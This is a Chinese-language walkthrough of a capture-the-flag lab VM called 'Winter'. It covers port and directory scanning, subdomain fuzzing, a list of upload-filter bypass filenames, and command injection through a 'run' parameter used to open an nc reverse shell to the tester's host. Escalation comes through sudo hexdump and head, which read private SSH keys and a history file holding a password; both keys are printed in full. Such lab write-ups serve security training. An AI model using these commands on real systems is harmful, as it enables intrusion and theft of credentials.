信息收集 NAMP 扫描 1 2 3 4 5 6 7 8 9 10 11 12 IP=192.168.0.178 nmap $IP Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-05 18:04 HKT Nmap scan report for 192.168.0.178 Host is up (0.0099s latency). Not shown: 998 closed tcp ports (conn-refused) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http Nmap done : 1 IP address (1 host up) scanned in 6.73 seconds
开着 80,跑一波目录。
1 gobuster dir -u http://$IP -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt -x php,txt,html,7z,zip,pdf
有一个 robots.txt
http://192.168.0.178/robots.txt
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 id whoami ls pwd netstat -ano catchme winter cd cd ../ ftp ssh http smtp manager admin superadmin ceo cto https tftp nano vim parrot linux shell
有一个 apache 的手册。 http://192.168.0.178/manual/ http://192.168.0.178/upload/ http://192.168.0.178/login.php
登录里能去注册账号。
1 2 3 4 5 6 7 8 9 10 1. winter_hacker found OS Command injection . 2. catchme found File Upload Vulnerability . 3. Technical Support found IDOR . Read More about OS Command Injection That's all for today's news
还贴心的送上了命令注入的文章: https://portswigger.net/web-security/os-command-injection
扫了一个 提示:http://192.168.0.178/fileinfo.txt
1 2 3 4 a small hint for you :) winter is my domain name!
有个域名?
加一下试试。
接下来访问 http://winter/
1 2 3 4 5 6 7 8 9 10 11 12 13 curl http://winter/ <html > <head > <meta charset ="UTF-8" /> <title > catchme</title > <link rel ="stylesheet" href ="glitch.css" /> </head > <body > <div class ="wrapper" > <h1 class ="glitch" > Winter</h1 > </div > </body > </html >
跑个目录呗:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 gobuster dir -u http://winter -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt -x php,txt,html,7z,zip,pdf /contact.php (Status: 302) [Size: 1213] [--> login.php] /logout.php (Status: 302) [Size: 0] [--> login.php] /login.php (Status: 200) [Size: 900] /news.php (Status: 302) [Size: 855] [--> login.php] /upload (Status: 301) [Size: 301] [--> http://winter/upload/] /about.php (Status: 302) [Size: 1018] [--> login.php] /home.php (Status: 302) [Size: 904] [--> login.php] /javascript (Status: 301) [Size: 305] [--> http://winter/javascript/] /index.html (Status: 200) [Size: 201] /manual (Status: 301) [Size: 301] [--> http://winter/manual/] /signup.php (Status: 200) [Size: 856] /settings.php (Status: 302) [Size: 1259] [--> login.php] /robots.txt (Status: 200) [Size: 237] /server-status (Status: 403) [Size: 271] /.html (Status: 403) [Size: 271] /.php (Status: 403) [Size: 271] /fileinfo.txt (Status: 200) [Size: 52]
看起来和之前的一样。那就说明还有子域名。看着 robots.txt 里的提示,难道就是子域名了?先试试看:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 echo 'id whoami ls pwd netstat catchme winter cd ftp ssh http smtp manager admin superadmin ceo cto https tftp nano vim parrot linux shell ' > subdomain.txt
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 wfuzz -w subdomain.txt -u http://winter/ -H "Host: FUZZ.winter" --hh 201 ******************************************************** * Wfuzz 3.1.0 - The Web Fuzzer * ******************************************************** Target: http://winter/ Total requests: 24 ===================================================================== ID Response Lines Word Chars Payload ===================================================================== 000000012: 200 14 L 17 W 199 Ch "manager" Total time: 0.038893 Processed Requests: 24 Filtered Requests: 23 Requests/sec.: 617.0665
跑出来一个 manager 的子域名。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 gobuster dir -u http://manager.winter -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt -x php,txt,html,7z,zip,pdf /contact.php (Status: 302) [Size: 1243] [--> login.php] /logout.php (Status: 302) [Size: 0] [--> login.php] /login.php (Status: 200) [Size: 1275] /news.php (Status: 302) [Size: 855] [--> login.php] /about.php (Status: 302) [Size: 1558] [--> login.php] /home.php (Status: 302) [Size: 907] [--> login.php] /javascript (Status: 301) [Size: 321] [--> http://manager.winter/javascript/] /index.html (Status: 200) [Size: 199] /manual (Status: 301) [Size: 317] [--> http://manager.winter/manual/] /server-status (Status: 403) [Size: 279] /.html (Status: 403) [Size: 279] /.php (Status: 403) [Size: 279] /index.html (Status: 200) [Size: 199] /.php (Status: 403) [Size: 279] /.html (Status: 403) [Size: 279] Progress: 393148 / 393155 (100.00%)
看起来似乎不太一样,又仿佛都一样。不过打开后发现确实不太一样了。登录页面长得不一样,而且账号密码也不一样。忘记密码功能是个摆设。都会跳转到 login.php 上。Only .jpg images under 350Kb are accepted for upload 只能是 jpg 图片。
1 2 3 git clone https://github.com/c0ny1/upload-fuzz-dic-builder.git python upload-fuzz-dic-builder.py -n 1 -a jpg -l php -m apache --os linux -o upload_file.txt
然后尝试用 Burp 的 Intruder 来 fuzz 上传。payload 用刚刚生成的 upload_file.txt,注意
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 1.phtml.xxx 1.php2.jpg 1.pHp3 1.pHp5.xxx 1.html%00.jpg 1.pHp4.xxx 1.pht%00.jpg 1.php2.xxx 1.pHp5%00.jpg 1.Html 1.pht.jpg 1.php4 1.pHp3 1.php2 1.php4 1.pHp3%00.jpg 1.pHtml.xxx 1.pHp5 1.phtml.jpg 1.htm%00.jpg 1.pHp5.jpg 1.pHp.xxx 1.Htm 1.php3.jpg 1.htm.xxx 1.pHp 1.html 1.Htm%00.jpg 1.pHp.jpg 1.pHp2.xxx 1.pHp4 1.pHtml 1.pHp2 1.Html%00.jpg 1.pHp3.jpg 1.php3.xxx 1.pHtml.jpg 1.Html.jpg 1.pHp 1.php%00.jpg 1.html.xxx 1.php2 1.php3 1.php3%00.jpg 1.Htm.xxx 1.php4.jpg 1.php.jpg 1.pHp3.xxx 1.php 1.php4.xxx 1.phtml 1.pHp2%00.jpg 1.pHtml 1.php.xxx 1.php5%00.jpg 1.htm.jpg 1.html.jpg 1.pHp5 1.phtml%00.jpg 1.pHp%00.jpg 1.Htm 1.php5.xxx 1.pht 1.html 1.pht.xxx 1.pHp4.jpg 1.htm 1.php4%00.jpg 1.Html.xxx 1.pHp2.jpg 1.php5.jpg 1.pHp2 1.Htm.jpg 1.phtml 1.php3 1.htm 1.pht 1.php5 1.Html 1.pHtml%00.jpg 1.pHp4%00.jpg 1.php5 1.php2%00.jpg 1.php 1.pHp4 .htaccess
上传结果大概看了下,能上传的,基本都是 .jpg 的结尾,中间可能有.php 或者.php3 之类的,但是 apache 也没有配置问题,所以不会用 php 解析这些文件。
尝试了 登录页面,看看是否有注入。简单用了 ‘ “ ` 等符号,看起来并没有什么效果。
一时间陷入僵局。
正当我打算爆破跑下这个 manager 的后台的时候,ll104567 提示了一下,说这个地方可以直接用 burp 拦一下请求,不用 301 跳转的情况下,其实能看见每个页面。这个时候才发现 gobuster 里面的 301 跳转,里面的页面大小是不一样的,说明页面渲染了。 不过同时也告诉我,其实也没用。 因为真的突破点在另一个大字典的子域名上。
再跑一个打字典看看子域名:
1 2 3 4 5 6 7 8 9 10 11 wfuzz -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://winter/ -H "Host: FUZZ.winter" --hh 201 ===================================================================== ID Response Lines Word Chars Payload ===================================================================== 000000491: 200 14 L 17 W 199 Ch "manager" 000008160: 200 14 L 17 W 198 Ch "cmd"
跑了一个 cmd 的子域名。再跑一下路径看看。
1 gobuster dir -u http://cmd.winter -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt -x php,txt,html,7z,zip,pdf
没啥东西。不过如果子域名是 cmd,再加上之前的 robots.txt 里的提示,是不是有一个命令注入?
1 wfuzz -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-words-lowercase.txt -u http://cmd.winter/?FUZZ=id --hh 198
一顿扫描啥都没有。又卡了一会,实在受不了了去看了 ll104567 的 WP ,卧槽,原来还是我用的字典不行。我真服了。。
换个字典:
1 2 3 gobuster dir -u http://cmd.winter -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -x php,txt,html,7z,zip,pdf /shellcity.php (Status: 200) [Size: 1040]
果然多了一条。不过我的思路是对的:
1 2 3 wfuzz -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-words-lowercase.txt -u http://cmd.winter/shellcity.php?FUZZ=id --hh 198 000003009: 200 57 L 106 W 1147 Ch "run"
跑出来了一个 run 的参数。可以执行命令。http://cmd.winter/shellcity.php?run=nc%20-e%20/bin/bash%20192.168.0.30%201234
提权 1 2 3 4 5 6 7 8 9 10 11 12 13 14 (remote) www-data@winter:/var/www/cmd$ sudo -l Matching Defaults entries for www-data on winter: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User www-data may run the following commands on winter: (catchme) NOPASSWD: /usr/bin/hexdump (remote) www-data@winter:/var/www/cmd$ sudo -u catchme /usr/bin/hexdump -h /usr/bin/hexdump: invalid option -- 'h' usage: hexdump [-bcCdovx] [-e fmt ] [-f fmt_file] [-n length] [-s skip] [file ...] hd [-bcdovx] [-e fmt ] [-f fmt_file] [-n length] [-s skip] [file ...]
这玩意看起来可以 16 进制看文件。那读下 flag?
1 2 3 sudo -u catchme /usr/bin/hexdump -C /home/catchme/user.txt 00000000 48 4d 56 6c 6f 63 61 6c 68 6f 73 74 0a 0000000d
还真可以。
读私钥呗:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 (remote) www-data@winter:/var/www/cmd$ sudo -u catchme /usr/bin/hexdump -C /home/catchme/.ssh/id_rsa 00000000 2d 2d 2d 2d 2d 42 45 47 49 4e 20 4f 50 45 4e 53 |-----BEGIN OPENS| 00000010 53 48 20 50 52 49 56 41 54 45 20 4b 45 59 2d 2d |SH PRIVATE KEY--| 00000020 2d 2d 2d 0a 62 33 42 6c 62 6e 4e 7a 61 43 31 72 |---.b3BlbnNzaC1r| 00000030 5a 58 6b 74 64 6a 45 41 41 41 41 41 42 47 35 76 |ZXktdjEAAAAABG5v| 00000040 62 6d 55 41 41 41 41 45 62 6d 39 75 5a 51 41 41 |bmUAAAAEbm9uZQAA| 00000050 41 41 41 41 41 41 41 42 41 41 41 42 46 77 41 41 |AAAAAAABAAABFwAA| 00000060 41 41 64 7a 63 32 67 74 63 6e 0a 4e 68 41 41 41 |AAdzc2gtcn.NhAAA| 00000070 41 41 77 45 41 41 51 41 41 41 51 45 41 74 53 53 |AAwEAAQAAAQEAtSS| 00000080 4e 55 6d 4f 32 30 46 4a 6e 49 47 47 74 6d 35 67 |NUmO20FJnIGGtm5g| 00000090 57 44 33 78 41 31 5a 47 66 67 34 78 6d 56 74 57 |WD3xA1ZGfg4xmVtW| 000000a0 46 6f 35 75 56 4c 47 38 57 42 74 4b 77 54 4d 62 |Fo5uVLG8WBtKwTMb| 000000b0 50 0a 65 54 30 52 78 70 32 32 39 61 51 34 62 6b |P.eT0Rxp229aQ4bk| 000000c0 70 67 62 32 45 56 4b 51 6a 65 45 6c 58 52 47 39 |pgb2EVKQjeElXRG9| 000000d0 44 6a 68 52 41 52 6b 43 6d 2f 49 61 46 77 54 38 |DjhRARkCm/IaFwT8| 000000e0 54 64 53 33 52 50 68 72 48 35 44 45 33 47 4d 64 |TdS3RPhrH5DE3GMd| 000000f0 77 44 5a 46 61 4b 61 49 0a 4a 37 51 63 5a 6f 73 |wDZFaKaI.J7QcZos| 00000100 4d 4c 54 2b 6f 35 65 45 37 31 6b 69 32 5a 42 4a |MLT+o5eE71ki2ZBJ| 00000110 48 67 69 43 71 65 69 4a 47 31 64 4d 2b 56 32 57 |HgiCqeiJG1dM+V2W| 00000120 37 67 58 72 71 36 76 43 41 56 57 67 4a 36 39 4b |7gXrq6vCAVWgJ69K| 00000130 51 56 61 78 56 31 71 6d 4e 45 37 31 4b 6b 6a 0a |QVaxV1qmNE71Kkj.| 00000140 31 43 6e 6b 42 46 6f 6e 73 66 39 74 51 74 31 32 |1CnkBFonsf9tQt12| 00000150 47 4a 6d 2f 75 38 62 76 57 48 41 49 34 5a 4f 75 |GJm/u8bvWHAI4ZOu| 00000160 6e 63 36 6f 53 56 45 4f 51 57 55 30 64 77 32 6f |nc6oSVEOQWU0dw2o| 00000170 50 43 2b 51 44 79 72 30 30 37 54 2f 62 6d 6c 58 |PC+QDyr007T/bmlX| 00000180 6d 4e 7a 50 6d 4f 0a 6a 66 44 76 46 78 65 37 39 |mNzPmO.jfDvFxe79| 00000190 58 73 42 6b 4d 78 67 76 77 6e 51 4a 55 36 71 48 |XsBkMxgvwnQJU6qH| 000001a0 30 38 66 4c 38 2b 32 46 46 7a 79 49 68 66 71 2f |08fL8+2FFzyIhfq/| 000001b0 44 66 66 47 5a 58 74 64 33 47 43 39 6f 6a 73 55 |DffGZXtd3GC9ojsU| 000001c0 50 70 2b 6c 59 65 4e 44 70 48 48 35 6e 0a 64 69 |Pp+lYeNDpHH5n.di| 000001d0 39 6d 53 44 69 7a 2b 51 41 41 41 38 6a 4d 41 35 |9mSDiz+QAAA8jMA5| 000001e0 36 36 7a 41 4f 65 75 67 41 41 41 41 64 7a 63 32 |66zAOeugAAAAdzc2| 000001f0 67 74 63 6e 4e 68 41 41 41 42 41 51 43 31 4a 49 |gtcnNhAAABAQC1JI| 00000200 31 53 59 37 62 51 55 6d 63 67 59 61 32 62 6d 42 |1SY7bQUmcgYa2bmB| 00000210 59 50 66 45 0a 44 56 6b 5a 2b 44 6a 47 5a 57 31 |YPfE.DVkZ+DjGZW1| 00000220 59 57 6a 6d 35 55 73 62 78 59 47 30 72 42 4d 78 |YWjm5UsbxYG0rBMx| 00000230 73 39 35 50 52 48 47 6e 62 62 31 70 44 68 75 53 |s95PRHGnbb1pDhuS| 00000240 6d 42 76 59 52 55 70 43 4e 34 53 56 64 45 62 30 |mBvYRUpCN4SVdEb0| 00000250 4f 4f 46 45 42 47 51 4b 62 38 68 0a 6f 58 42 50 |OOFEBGQKb8h.oXBP| 00000260 78 4e 31 4c 64 45 2b 47 73 66 6b 4d 54 63 59 78 |xN1LdE+GsfkMTcYx| 00000270 33 41 4e 6b 56 6f 70 6f 67 6e 74 42 78 6d 69 77 |3ANkVopogntBxmiw| 00000280 77 74 50 36 6a 6c 34 54 76 57 53 4c 5a 6b 45 6b |wtP6jl4TvWSLZkEk| 00000290 65 43 49 4b 70 36 49 6b 62 56 30 7a 35 58 5a 62 |eCIKp6IkbV0z5XZb| 000002a0 75 42 0a 65 75 72 71 38 49 42 56 61 41 6e 72 30 |uB.eurq8IBVaAnr0| 000002b0 70 42 56 72 46 58 57 71 59 30 54 76 55 71 53 50 |pBVrFXWqY0TvUqSP| 000002c0 55 4b 65 51 45 57 69 65 78 2f 32 31 43 33 58 59 |UKeQEWiex/21C3XY| 000002d0 59 6d 62 2b 37 78 75 39 59 63 41 6a 68 6b 36 36 |Ymb+7xu9YcAjhk66| 000002e0 64 7a 71 68 4a 55 51 35 42 0a 5a 54 52 33 44 61 |dzqhJUQ5B.ZTR3Da| 000002f0 67 38 4c 35 41 50 4b 76 54 54 74 50 39 75 61 56 |g8L5APKvTTtP9uaV| 00000300 65 59 33 4d 2b 59 36 4e 38 4f 38 58 46 37 76 31 |eY3M+Y6N8O8XF7v1| 00000310 65 77 47 51 7a 47 43 2f 43 64 41 6c 54 71 6f 66 |ewGQzGC/CdAlTqof| 00000320 54 78 38 76 7a 37 59 55 58 50 49 69 46 2b 72 38 |Tx8vz7YUXPIiF+r8| 00000330 0a 4e 39 38 5a 6c 65 31 33 63 59 4c 32 69 4f 78 |.N98Zle13cYL2iOx| 00000340 51 2b 6e 36 56 68 34 30 4f 6b 63 66 6d 64 32 4c |Q+n6Vh40Okcfmd2L| 00000350 32 5a 49 4f 4c 50 35 41 41 41 41 41 77 45 41 41 |2ZIOLP5AAAAAwEAA| 00000360 51 41 41 41 51 41 57 41 6e 48 31 62 38 34 33 73 |QAAAQAWAnH1b843s| 00000370 37 74 36 45 4d 52 43 0a 59 70 46 54 6f 6c 70 53 |7t6EMRC.YpFTolpS| 00000380 57 4e 5a 54 36 6f 78 49 77 72 72 78 4c 53 64 4c |WNZT6oxIwrrxLSdL| 00000390 39 64 64 73 54 73 39 44 46 4f 6b 43 70 79 76 77 |9ddsTs9DFOkCpyvw| 000003a0 77 52 73 49 37 38 49 33 6a 47 76 35 50 49 65 51 |wRsI78I3jGv5PIeQ| 000003b0 71 39 59 6e 7a 69 75 52 51 4b 6c 55 63 71 0a 5a |q9YnziuRQKlUcq.Z| 000003c0 66 71 4f 4c 6a 57 44 56 49 53 2f 68 44 67 63 64 |fqOLjWDVIS/hDgcd| 000003d0 6a 36 31 34 43 59 37 54 51 50 42 5a 68 61 36 35 |j614CY7TQPBZha65| 000003e0 33 6b 6c 73 64 6d 39 6a 2b 6d 54 32 65 64 51 76 |3klsdm9j+mT2edQv| 000003f0 7a 52 42 44 69 61 7a 4e 42 46 69 4f 30 76 62 65 |zRBDiazNBFiO0vbe| 00000400 53 79 34 4d 47 0a 6d 6a 76 75 57 77 6a 74 6e 61 |Sy4MG.mjvuWwjtna| 00000410 59 41 79 45 6a 65 4f 38 7a 68 39 4e 51 58 41 47 |YAyEjeO8zh9NQXAG| 00000420 72 4c 69 59 78 73 79 42 68 45 44 63 74 56 39 51 |rLiYxsyBhEDctV9Q| 00000430 4e 33 45 2f 32 78 67 6e 30 47 37 32 31 72 62 62 |N3E/2xgn0G721rbb| 00000440 73 58 36 71 6d 7a 2b 52 6c 74 57 33 0a 44 46 4c |sX6qmz+RltW3.DFL| 00000450 43 46 54 6a 51 69 4c 4a 65 2b 62 34 79 6d 48 70 |CFTjQiLJe+b4ymHp| 00000460 35 4c 74 6f 43 38 72 6e 62 70 4a 41 71 69 75 41 |5LtoC8rnbpJAqiuA| 00000470 4f 6e 4a 77 77 72 6f 38 38 4c 53 75 71 47 2b 6f |OnJwwro88LSuqG+o| 00000480 2b 78 79 47 76 4d 6f 45 4b 6a 4d 35 70 65 51 73 |+xyGvMoEKjM5peQs| 00000490 2f 67 35 0a 36 38 55 6a 65 77 58 48 35 36 68 39 |/g5.68UjewXH56h9| 000004a0 44 47 76 54 69 2b 7a 55 6d 50 30 66 51 68 36 52 |DGvTi+zUmP0fQh6R| 000004b0 32 4c 53 33 73 6c 6e 64 79 68 59 33 33 5a 65 39 |2LS3slndyhY33Ze9| 000004c0 41 41 41 41 67 51 44 67 78 6b 4c 57 61 56 36 56 |AAAAgQDgxkLWaV6V| 000004d0 61 52 31 39 76 4a 53 4b 75 45 0a 62 7a 4f 61 66 |aR19vJSKuE.bzOaf| 000004e0 7a 31 56 58 49 41 65 62 65 59 30 72 7a 46 36 35 |z1VXIAebeY0rzF65| 000004f0 49 56 75 5a 50 65 75 38 69 34 65 72 35 45 2b 44 |IVuZPeu8i4er5E+D| 00000500 46 32 43 43 6f 46 48 46 61 30 39 67 6c 57 6a 36 |F2CCoFHFa09glWj6| 00000510 53 2f 30 71 70 68 48 69 71 46 30 51 68 6b 54 4f |S/0qphHiqF0QhkTO| 00000520 56 0a 33 62 6d 7a 6d 48 4d 50 62 37 61 7a 2f 30 |V.3bmzmHMPb7az/0| 00000530 2b 6c 6c 2f 39 35 71 70 78 52 5a 79 33 68 33 58 |+ll/95qpxRZy3h3X| 00000540 52 61 43 38 50 77 4d 50 63 79 6e 44 46 4d 49 67 |RaC8PwMPcynDFMIg| 00000550 63 70 2f 55 4f 66 70 74 2f 42 41 30 53 35 2b 6d |cp /UOfpt/BA0S5+m| 00000560 34 73 75 55 37 37 65 77 0a 4d 57 42 4d 46 6e 31 |4suU77ew.MWBMFn1| 00000570 50 63 78 6e 77 41 41 41 49 45 41 34 5a 6a 68 45 |PcxnwAAAIEA4ZjhE| 00000580 4e 39 72 51 32 46 57 6f 44 51 49 58 75 6c 32 34 |N9rQ2FWoDQIXul24| 00000590 45 61 64 5a 30 4c 42 44 50 72 6b 41 36 6c 43 2f |EadZ0LBDPrkA6lC/| 000005a0 36 6c 76 79 46 42 33 48 73 49 52 64 66 48 6f 0a |6lvyFB3HsIRdfHo.| 000005b0 62 5a 71 71 6d 78 2b 70 31 53 63 71 4d 4f 43 37 |bZqqmx+p1ScqMOC7| 000005c0 36 69 70 41 74 50 6d 6d 35 2f 50 6b 73 43 58 31 |6ipAtPmm5/PksCX1| 000005d0 43 71 42 31 37 37 55 35 54 32 44 42 67 63 35 59 |CqB177U5T2DBgc5Y| 000005e0 51 48 37 6e 4b 57 69 6d 64 6b 52 61 34 2b 46 39 |QH7nKWimdkRa4+F9| 000005f0 6d 37 75 6d 39 78 0a 58 33 77 47 36 6d 6c 50 69 |m7um9x.X3wG6mlPi| 00000600 6f 35 35 47 4e 54 4c 45 68 37 47 75 39 50 42 4c |o55GNTLEh7Gu9PBL| 00000610 38 4a 35 59 5a 45 74 57 70 71 35 78 54 54 39 65 |8J5YZEtWpq5xTT9e| 00000620 79 56 70 44 38 46 6d 63 41 41 41 43 42 41 4d 32 |yVpD8FmcAAACBAM2| 00000630 4e 2f 68 41 6d 4c 76 41 30 2b 67 69 37 0a 51 4f |N/hAmLvA0+gi7.QO| 00000640 68 4a 36 2f 77 2b 43 77 74 50 76 35 4b 67 66 65 |hJ6/w+CwtPv5Kgfe| 00000650 78 6c 6e 50 50 32 45 38 33 37 38 61 4a 75 35 67 |xlnPP2E8378aJu5g| 00000660 2b 4f 5a 4c 54 31 4f 59 58 4d 43 68 69 73 75 48 |+OZLT1OYXMChisuH| 00000670 53 46 43 6b 42 6f 45 52 53 72 45 58 51 68 49 74 |SFCkBoERSrEXQhIt| 00000680 2f 45 41 55 0a 61 64 41 55 4d 31 49 61 6e 6b 58 |/EAU.adAUM1IankX| 00000690 50 79 79 6e 78 47 56 49 57 6d 73 58 54 36 39 34 |PyynxGVIWmsXT694| 000006a0 4b 68 6c 4d 49 6d 44 65 53 31 4e 43 74 68 72 6f |KhlMImDeS1NCthro| 000006b0 32 6c 51 43 30 46 4b 59 57 53 38 4e 67 74 45 39 |2lQC0FKYWS8NgtE9| 000006c0 36 53 62 4f 32 57 69 61 52 7a 48 0a 42 62 6b 68 |6SbO2WiaRzH.Bbkh| 000006d0 72 6c 36 52 46 59 4b 64 34 4b 61 66 41 41 41 41 |rl6RFYKd4KafAAAA| 000006e0 44 6d 4e 68 64 47 4e 6f 62 57 56 41 64 32 6c 75 |DmNhdGNobWVAd2lu| 000006f0 64 47 56 79 41 51 49 44 42 41 3d 3d 0a 2d 2d 2d |dGVyAQIDBA==.---| 00000700 2d 2d 45 4e 44 20 4f 50 45 4e 53 53 48 20 50 52 |--END OPENSSH PR| 00000710 49 56 41 54 45 20 4b 45 59 2d 2d 2d 2d 2d 0a |IVATE KEY-----.| 0000071f
有密码。来破解一波:
1 2 ssh2john.py id > id.hash id has no password!
这给我整蒙了。。
1 2 3 4 sudo -u catchme /usr/bin/hexdump -C /home/catchme/.bash_history00000000 4d 79 20 50 61 73 73 77 6f 72 64 20 69 73 20 3a |My Password is :| 00000010 20 77 69 6e 74 65 72 75 73 65 72 63 61 74 63 68 | winterusercatch| 00000020 0a 65 78 69 74 0a |.exit .|
你说离谱不?
1 2 3 ssh catchme@$IP catchme@winter:~$ id uid=1000(catchme) gid=1000(catchme) groups =1000(catchme),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth)
Root 提权 1 2 3 4 5 6 7 catchme@winter:~$ sudo -l Matching Defaults entries for catchme on winter: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User catchme may run the following commands on winter: (root) NOPASSWD: /usr/bin/head
这。。 又是读取?
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 catchme@winter:~$ sudo /usr/bin/head -n 1 /root/root.txt sudo /usr/bin/head -n 1000 /root/.ssh/id_rsa-----BEGIN OPENSSH PRIVATE KEY----- b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn NhAAAAAwEAAQAAAQEA4F18HTzuOk3Paoz2Lw+zBanzInzlLNmaX0WWE+qvRmIKtxsPqacg OVA/sHTHAm/Ey/CpmdIvRUbPhmfeaDapO2qkgrmHYL+PyQ2I4UmkYxVFlogWaKIFqAi93X FZKDxTh5Vi2zieUmgMBRlYOaXcltJrYfF+CkBrwRFDEDRZ/csG9/mFBEyeZTTpNAe5VuPm RUoE0ynRvrf4UskGwJy2PvzHzqylwMR7ZWRwOeh8DsVHMiAmMhhX8eeJNKi2COtgcKvSiO Fr1AmLYA8O1i+KvXSuBf2LqXZvfeI3OywLbmwhmaPYJEqiinmmv6kyfOeyupknnrxYqCob 5KIkOQ6JjwAAA8ARV3ofEVd6HwAAAAdzc2gtcnNhAAABAQDgXXwdPO46Tc9qjPYvD7MFqf MifOUs2ZpfRZYT6q9GYgq3Gw+ppyA5UD+wdMcCb8TL8KmZ0i9FRs+GZ95oNqk7aqSCuYdg v4/JDYjhSaRjFUWWiBZoogWoCL3dcVkoPFOHlWLbOJ5SaAwFGVg5pdyW0mth8X4KQGvBEU MQNFn9ywb3+YUETJ5lNOk0B7lW4+ZFSgTTKdG+t/hSyQbAnLY+/MfOrKXAxHtlZHA56HwO xUcyICYyGFfx54k0qLYI62Bwq9KI4WvUCYtgDw7WL4q9dK4F/Yupdm994jc7LAtubCGZo9 gkSqKKeaa/qTJ857K6mSeevFioKhvkoiQ5DomPAAAAAwEAAQAAAQBP+eLhBTQiAlR6Na8X jXASB8eMNpr2hsaZSVO628AIxa/uHy5RGirJY0qgmq/JtY+f5rR+CUciWaBl16aW3U0ryd LEal/QY9hcIX/2VmrLiuyYQQBD4eVERYFwaxQN3JslzGFFpYQB+ea29pbVTcM42969Nfjo rJf8ZSvTneWqKkbrd4wC7rdwyT4MkvLMXcddDUq96lpZtTTrHK7UrnEEUyxvLGdicDEsHY OIN0R+Jy6PWYcqbqdG77Tz/COdqJK6F1AmZj2T2vSNgVqpJjRZSfJN3U5/1OZnEu00Cyjb +3XhhNNKRlW/iM9LOzq1D8L3Lm/mKgkK/AtHO3X8VScBAAAAgAEbod+nBWtuRkezkQY3Yh t1+7eXXIPjF2JTs1XonZ47/BbSO8ndQhYv/5j1RjubfENuQCqJzldFSv4INS3aaXfBzzmV +7+rA5ce4N53vLKdmZWrbx33aCl/mwM7VsZ1HhqDighl+EB4F0pE4KdMdscLcOyv1pc+w4 jFQd195s7NAAAAgQD3OlnliepszrdY/vlKdSpbUTU5Cx77t6d9bod1Fs37a/a0SRfswFw/ 7MS2ex56bU7wo7PE2qXJGEySEg3dFJhVNsRfAiR0j95MfTITXOmQ2vyrxdqppSguTnh+Xi uismWUWljX+6ylmq69aYtpKu1t1eF3zuL1kcViG4lPtd/SDwAAAIEA6FN2zCwZeC00j12P DFcM6BSAA/70OdNNNG+04p7HxkR5bWj4Yi386N/Epf18B4LCokX3GPCMvatAVx+cucpzPE pwoFaowj+STiVvzTZwd6vODETD1h1MKLRQMmdTcTb5yWMpxAoih7GeiusGWNQl0VDAmFfj TVtPYwN8hEFPUIEAAAALcm9vdEB3aW50ZXI= -----END OPENSSH PRIVATE KEY----- ssh root@$IP -i idroot [email protected] 's password:
这没完没了了是吗。 我以为还是读其他呢,又看了下 ll104567 的 WP, 确实没拿到 root,那我就放心了,完结撒花 🎉
总结 这个靶场最大的感想就是,坑比较多,能试的地方太多了,信息多了一开始很开心,实际上很折磨。
